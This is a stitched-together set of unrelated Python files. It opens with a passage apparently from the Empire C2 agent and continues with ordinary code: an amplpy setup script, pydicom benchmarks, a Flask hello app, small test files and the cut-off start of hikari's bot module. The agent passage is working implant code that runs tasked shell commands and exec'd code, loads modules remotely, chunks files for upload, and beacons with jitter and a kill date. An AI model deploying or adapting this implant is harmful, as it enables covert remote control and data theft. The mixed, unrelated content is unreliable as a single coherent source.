loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
# remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
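# For example, old_div(7, 2) == 3 (integral operands floor-divide), while
# old_div(7.0, 2) == 3.5 (true division once either operand is a float).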
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
# check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
        # Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
            raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
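# Usage sketch (repo and module names below are hypothetical): once a zip has been
# delivered via packet type 122 and stored in moduleRepo, its contents become
# importable through the hook, e.g.
#   install_hook('toolkit')   # attach a CFinder for the 'toolkit' repo
#   import sometool           # resolved from moduleRepo['toolkit'] by CFinder
#   remove_hook('toolkit')    # detach the finder when finished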
################################################
#
# misc methods
#
################################################
class compress(object):
'''
    Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
        cvalue = 0-9 comp value (default 9)
'''
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
'''
    Base class for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
        dict with crc32 check and decompressed data string
        ex. {"crc32_check" : True, "data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
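# Round-trip sketch (illustrative): build a CRC32-prefixed compressed blob and
# verify it with the decompress helper, e.g.
#   c, d = compress(), decompress()
#   raw = b"example payload"
#   blob = c.build_header(c.comp_data(raw), c.crc32_data(raw))
#   out = d.dec_data(blob, cheader=True)
#   assert out['crc32_check'] and out['data'] == raw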
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs={}, Verbose=None):
        # Python 3's Thread.__init__ no longer accepts a Verbose argument
        Thread.__init__(self, group, target, name, args, kwargs)
        self._return = None
    def run(self):
        # Thread's private attributes are _target/_args/_kwargs in Python 3
        if self._target is not None:
            self._return = self._target(*self._args, **self._kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
        self.run = self.__run  # Force the Thread to install our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code, resultID):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code[1:])
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/process Packet start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
# now call the function required
# and capture the output via sys
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
            s.wfile.write(data.encode('utf-8'))
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
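# For example, permissions_to_unix_name(0o644) returns 'rw-r--r--'
# (owner read/write, group and others read-only).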
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
        if os.path.isdir(os.path.join(path, fn)):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command, cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
    # the 'base64' parameter shadows the base64 module, so alias the module locally
    import base64 as _b64
    if not os.path.exists(filePath):
        return ''
    f = open(filePath, 'rb')
    f.seek(offset, 0)
    data = f.read(chunkSize)
    f.close()
    if base64:
        return _b64.b64encode(data)
    else:
        return data
################################################
#
# main agent functionality
#
################################################
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
        # exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
# -*- coding: utf-8 -*-
"""
AMPLPY
------
AMPL API is an interface that allows developers to access the features of the
AMPL interpreter from within a programming language. All model generation and
solver interaction is handled directly by AMPL, which leads to great stability
and speed; the library just acts as an intermediary, and the added overhead
(in terms of memory and CPU usage) depends mostly on how much data is read
back from AMPL, the size of the model as such is irrelevant. Functions for
directly assigning data to AMPL parameters and sets are provided, which can
be used instead of the normal AMPL data reading procedures. AMPL API has been
written with usability in mind, and it is easy to access its functionalities
from C++, Java, C#, MATLAB, R and Python.
The AMPL API can function as an add-on to any existing AMPL installation. If
you do not yet have an AMPL installation on the computer where you will be
working with the API, see our
`demo page <http://ampl.com/try-ampl/download-a-free-demo/>`_
or
`trial page <http://ampl.com/try-ampl/request-a-full-trial/>`_
to download a working version that can be installed quickly.
Documentation:
``````````````
* http://amplpy.readthedocs.io
* http://ampl.com/api/nightly/python/
Repositories:
`````````````
* GitHub Repository: https://github.com/ampl/amplpy
* PyPI Repository: https://pypi.python.org/pypi/amplpy
"""
from setuptools import setup, Extension
import platform
import os
OSTYPE = platform.system()
x64 = platform.architecture()[0] == '64bit'
def ls_dir(base_dir):
"""List files recursively."""
return [
os.path.join(dirpath.replace(base_dir, '', 1), f)
for (dirpath, dirnames, files) in os.walk(base_dir)
for f in files
]
def make_relative_rpath(path):
if OSTYPE == 'Darwin':
return '-Wl,-rpath,@loader_path/' + path
elif OSTYPE == 'Linux':
return '-Wl,-rpath,$ORIGIN/' + path
else:
return ''
def compile_args():
if OSTYPE == 'Windows':
return ['/TP /EHsc']
elif OSTYPE == 'Linux':
return ['-std=c++11']
else:
return []
libdir = 'lib64' if x64 else 'lib32'
setup(
name='amplpy',
version='0.6.7',
description='Python API for AMPL',
long_description=__doc__,
license='BSD-3',
platforms='any',
author='Filipe Brandão',
author_email='fdabrandao@ampl.com',
url='http://ampl.com/',
download_url='https://github.com/ampl/amplpy',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C++',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
packages=['amplpy'],
ext_modules=[Extension(
'_amplpython',
libraries=['ampl'],
library_dirs=[os.path.join('amplpy', 'amplpython', libdir)],
include_dirs=[os.path.join('amplpy', 'amplpython', 'include')],
extra_compile_args=compile_args(),
extra_link_args=[
make_relative_rpath(os.path.join('amplpy', 'amplpython', libdir))
],
sources=[
os.path.join('amplpy', 'amplpython', 'amplpythonPYTHON_wrap.cxx')
],
)],
package_data={'': ls_dir('amplpy/')},
install_requires=['future >= 0.15.0']
)
|
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Benchmarks for the numpy_handler module.
Requires asv and numpy.
"""
from platform import python_implementation
from tempfile import TemporaryFile
import numpy as np
from pydicom import dcmread
from pydicom.data import get_testdata_file
from pydicom.dataset import Dataset, FileMetaDataset
from pydicom.pixel_data_handlers.numpy_handler import get_pixeldata
from pydicom.uid import ExplicitVRLittleEndian, generate_uid
# 1/1, 1 sample/pixel, 1 frame
EXPL_1_1_1F = get_testdata_file("liver_1frame.dcm")
# 1/1, 1 sample/pixel, 3 frame
EXPL_1_1_3F = get_testdata_file("liver.dcm")
# 8/8, 1 sample/pixel, 1 frame
EXPL_8_1_1F = get_testdata_file("OBXXXX1A.dcm")
# 8/8, 1 sample/pixel, 2 frame
EXPL_8_1_2F = get_testdata_file("OBXXXX1A_2frame.dcm")
# 8/8, 3 sample/pixel, 1 frame
EXPL_8_3_1F = get_testdata_file("SC_rgb.dcm")
# 8/8, 3 sample/pixel, 1 frame, YBR_FULL_422
EXPL_8_3_1F_YBR422 = get_testdata_file('SC_ybr_full_422_uncompressed.dcm')
# 8/8, 3 sample/pixel, 2 frame
EXPL_8_3_2F = get_testdata_file("SC_rgb_2frame.dcm")
# 16/16, 1 sample/pixel, 1 frame
EXPL_16_1_1F = get_testdata_file("MR_small.dcm")
# 16/12, 1 sample/pixel, 10 frame
EXPL_16_1_10F = get_testdata_file("emri_small.dcm")
# 16/16, 3 sample/pixel, 1 frame
EXPL_16_3_1F = get_testdata_file("SC_rgb_16bit.dcm")
# 16/16, 3 sample/pixel, 2 frame
EXPL_16_3_2F = get_testdata_file("SC_rgb_16bit_2frame.dcm")
# 32/32, 1 sample/pixel, 1 frame
IMPL_32_1_1F = get_testdata_file("rtdose_1frame.dcm")
# 32/32, 1 sample/pixel, 15 frame
IMPL_32_1_15F = get_testdata_file("rtdose.dcm")
# 32/32, 3 sample/pixel, 1 frame
EXPL_32_3_1F = get_testdata_file("SC_rgb_32bit.dcm")
# 32/32, 3 sample/pixel, 2 frame
EXPL_32_3_2F = get_testdata_file("SC_rgb_32bit_2frame.dcm")
def _create_temporary_dataset(shape=(100, 1024, 1024, 3), bit_depth=16):
"""Function to create a temporary dataset for use in testing.
Parameters
----------
shape : 4-tuple
The (frames, rows, columns, channels) of the test dataset.
bit_depth : int
The BitsAllocated value to use for the dataset, one of 8, 16, 32, 64.
Returns
-------
tempfile.TemporaryFile
A created DICOM File Format conformant dataset.
"""
ds = Dataset()
ds.is_little_endian = True
ds.is_implicit_VR = False
ds.file_meta = FileMetaDataset()
ds.file_meta.TransferSyntaxUID = ExplicitVRLittleEndian
ds.SOPClassUID = '1.2.3.4'
ds.SOPInstanceUID = generate_uid()
ds.BitsAllocated = bit_depth
ds.PixelRepresentation = 0
ds.PlanarConfiguration = 0
ds.Rows = shape[1]
ds.Columns = shape[2]
ds.NumberOfFrames = shape[0]
ds.SamplesPerPixel = shape[3]
if shape[3] == 1:
ds.PhotometricInterpretation = 'MONOCHROME2'
elif shape[3] == 3:
ds.PhotometricInterpretation = 'RGB'
arr = np.zeros(shape, dtype='uint{}'.format(bit_depth))
ds.PixelData = arr.tobytes()
if len(ds.PixelData) % 2:
ds.PixelData += b'\x00'
tfile = TemporaryFile(mode='w+b')
ds.save_as(tfile, write_like_original=False)
tfile.seek(0)
return tfile
class TimeGetPixelData_LargeDataset:
"""Time tests for numpy_handler.get_pixeldata with large datasets."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_16_3_100 = dcmread(_create_temporary_dataset())
def time_large_dataset(self):
"""Time reading pixel data from a large dataset."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_100)
class TimeGetPixelData:
"""Time tests for numpy_handler.get_pixeldata."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_1_1_1 = dcmread(EXPL_1_1_1F)
self.ds_1_1_3 = dcmread(EXPL_1_1_3F)
self.ds_8_1_1 = dcmread(EXPL_8_1_1F)
self.ds_8_1_2 = dcmread(EXPL_8_1_2F)
self.ds_8_3_1 = dcmread(EXPL_8_3_1F)
self.ds_8_3_2 = dcmread(EXPL_8_3_2F)
self.ds_16_1_1 = dcmread(EXPL_16_1_1F)
self.ds_16_1_10 = dcmread(EXPL_16_1_10F)
self.ds_16_3_1 = dcmread(EXPL_16_3_1F)
self.ds_16_3_2 = dcmread(EXPL_16_3_2F)
self.ds_32_1_1 = dcmread(IMPL_32_1_1F)
self.ds_32_1_15 = dcmread(IMPL_32_1_15F)
self.ds_32_3_1 = dcmread(EXPL_32_3_1F)
self.ds_32_3_2 = dcmread(EXPL_32_3_2F)
self.ds_ybr_422 = dcmread(EXPL_8_3_1F_YBR422)
def time_1bit_1sample_1frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 1 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_1)
def time_1bit_1sample_3frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 3 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_3)
def time_8bit_1sample_1frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_1)
def time_8bit_1sample_2frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_2)
def time_8bit_3sample_1frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_1)
def time_8bit_3sample_2frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_2)
def time_16bit_1sample_1frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_1)
def time_16bit_1sample_10frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 10 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_10)
def time_16bit_3sample_1frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_1)
def time_16bit_3sample_2frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_2)
def time_32bit_1sample_1frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_1)
def time_32bit_1sample_15frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 15 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_15)
def time_32bit_3sample_1frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_1)
def time_32bit_3sample_2frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_2)
def time_ybr_422(self):
"""Time retrieval of YBR_FULL_422 data."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_ybr_422)
|
# Copyright 2018 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import socket
from flask import Flask, request
app = Flask(__name__)
@app.route("/", methods=["GET", "POST"])
def hello():
    print(request.data)
return "Hello Container World! My hostname is {}.\n".format(socket.gethostname())
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 12, transform = "RelativeDifference", sigma = 0.0, exog_count = 0, ar_order = 12);
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from whats import whats
def test_tellme():
assert whats.tellme('美妙的新世界')
|
# pylint: disable=redefined-builtin
# pylint: disable=too-many-arguments
"""Test related method and functionality of Context."""
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
"""DataUpload gets the id and result when upload csv file or datafram."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
"""DataUpload fails when status and result create fail conditions."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
"""Raise exceptions when upload empty files."""
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
"""DataUpload status is fail if stopped during pending, running, and fail status,
remains if in done status. The experiment following will failed if data
failed.
"""
async def cancel(data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
|
# -*- coding: utf-8 -*-
# cython: language_level=3
# Copyright (c) 2020 Nekokatt
# Copyright (c) 2021-present davfsa
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Basic implementation the components for a single-process bot."""
from __future__ import annotations
__all__: typing.List[str] = ["GatewayBot"]
import asyncio
import datetime
import logging
import math
import signal
import sys
import threading
import traceback
import types
import typing
import warnings
from hikari import applications
from hikari import errors
from hikari import intents as intents_
from hikari import presences
from hikari import snowflakes
from hikari import traits
from hikari import undefined
from hikari.impl import cache as cache_impl
from hikari.impl import config as config_impl
from hikari.impl import entity_factory as entity_factory_impl
from hikari.impl import event_factory as event_factory_impl
from hikari.impl import event_manager as event_manager_impl
from hikari.impl import rest as rest_impl
from hikari.impl import shard as shard_impl
from hikari.impl import voice as voice_impl
from hikari.internal import aio
from hikari.internal import time
from hikari.internal import ux
if typing.TYPE_CHECKING:
import concurrent.futures
from hikari import channels
from hikari import guilds
from hikari import users as users_
from hikari.api import cache as cache_
from hikari.api import entity_factory as entity_factory_
from hikari.api import event_factory as event_factory_
from hikari.api import event_manager as event_manager_
from hikari.api import rest as rest_
from hikari.api import shard as gateway_shard
from hikari.api import voice as voice_
_LOGGER: typing.Final[logging.Logger] = logging.getLogger("hikari.bot")
async def _gather(coros: typing.Iterator[typing.Awaitable[typing.Any]]) -> None:
# Calling asyncio.gather outside of a running event loop isn't safe and
# will lead to RuntimeErrors in later versions of python, so this call is
# kept within a coroutine function.
await asyncio.gather(*coros)
def _destroy_loop(loop: asyncio.AbstractEventLoop) -> None:
async def murder(future: asyncio.Future[typing.Any]) -> None:
# These include _GatheringFuture which must be awaited if the children
# throw an asyncio.CancelledError, otherwise it will spam logs with warnings
# about exceptions not being retrieved before GC.
try:
_LOGGER.log(ux.TRACE, "killing %s", future)
